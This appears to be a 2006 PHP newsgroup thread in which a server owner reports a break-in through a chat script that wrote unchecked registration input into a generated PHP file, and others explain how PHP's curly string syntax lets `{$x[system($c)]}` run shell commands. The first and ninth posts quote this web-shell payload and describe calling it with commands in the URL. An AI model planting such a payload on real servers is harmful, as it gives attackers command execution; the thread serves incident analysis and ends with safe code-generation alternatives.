Hacked with system()

Hello,

Our server got hacked through a security hole in an open source PHP
chat script.
(Nothing new so far, ok!)

This chat script allowed the user to create a new PHP script on our
server, with the following content (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

Save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: how does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I would understand.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo

Sep 5 '06 #1
Oski wrote:
But: how does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I would understand.
If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Tim
Sep 5 '06 #2
Tim Martin wrote:
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.

$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal

$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user

is fine.

Tim
Sep 5 '06 #3
In article <11**********************@m79g2000cwm.googlegroups.com>,
"Oski" <os**@gmx.de> wrote:
But: how does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I would understand.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the output. Is there any $x declaration in
the script?

For instance, this:

<?php
$x["var"] = "foobar";          // one array element, keyed by the name "var"
$c = "ls";
$name = "{$x[system($c)]}";    // system() runs; its last output line becomes the array key
print "Value: $name";
?>

Outputs, after a long list of directories in my root directory (where
'var' is the last):

Value: foobar

So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.

Why? I have no idea. I'd have to see the entire script for that.
--
Sandman[.net]
Sep 5 '06 #4
our server got hacked through a security hole in an open source php
chat script.
Which one?

Regards,
Talthen
Sep 5 '06 #5
Sandman wrote:
Why? I have no idea. I'd have to see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as omitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Ingo.

Sep 5 '06 #6
In article <11*********************@m73g2000cwd.googlegroups.com>,
"Oski" <os**@gmx.de> wrote:
There is no more script, no more than what was posted by me! The other
lines (mentioned as omitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this way also, so I've seen some of these scripts.

--
Sandman[.net]
Sep 5 '06 #7
Oski wrote:
This chat script allowed the user to create a new php script on our
server, [snip]
Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).

Robin
Sep 5 '06 #8
Sandman wrote:
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this way also, so I've seen some of these scripts.
In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput>";
$email = "<userinput_2>";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.

Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).

But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.

Ingo

Sep 5 '06 #9
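The mechanism Tim explains in #2 and the file generation Ingo describes in #9, as an added example that is not from the thread or from the chat script: PHP's curly ("complex") string syntax evaluates any expression inside the array brackets, so a user-supplied name pasted into a double-quoted literal in generated source is live code. The harmless strtoupper() stands in for the function call in the thread, and the generator functions and sample input are assumptions.

```php
<?php
// Added example (not the chat script's code). Shows why `$name = "<userinput>";`
// written into a generated PHP file is dangerous, and two safe alternatives.

// Mechanism: inside a double-quoted string, {$x[expr]} evaluates expr as a
// full PHP expression, function calls included, and uses its result as the key.
$x = ['HELLO' => 'matched'];
$c = 'hello';
$name = "{$x[strtoupper($c)]}";   // strtoupper() is called; $x['HELLO'] is looked up
var_dump($name);                  // string(7) "matched"

// Vulnerable generator, same shape as the chat script: the registration name
// is pasted verbatim into a string literal of a file PHP will later execute.
function generate_unsafe(string $user_name): string {
    return "<?php\n\$name = \"$user_name\";\n";
}

// Safe generator: var_export() emits a single-quoted PHP literal with quotes
// and backslashes escaped, so no interpolation syntax inside it is live.
function generate_safe(string $user_name): string {
    return "<?php\n\$name = " . var_export($user_name, true) . ";\n";
}

// Safer still: keep data out of code. Store the registration as JSON and have
// the chat script read it back; nothing the user typed is ever parsed as PHP.
function generate_json(string $user_name, string $email): string {
    return json_encode(['name' => $user_name, 'email' => $email], JSON_THROW_ON_ERROR);
}

// Constructed sample: a "name" containing curly syntax with a function call.
$input = '{$x[strtoupper($c)]}';
echo generate_unsafe($input);     // $name = "{$x[strtoupper($c)]}";  <- evaluated when the file runs
echo generate_safe($input);       // $name = '{$x[strtoupper($c)]}';  <- inert text
echo generate_json($input, 'user@example.invalid'), "\n";
```

The same applies to any value the generator writes: magic_quotes only escapes quote characters and would not have stopped the curly syntax, since the payload needs no quotes at all.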
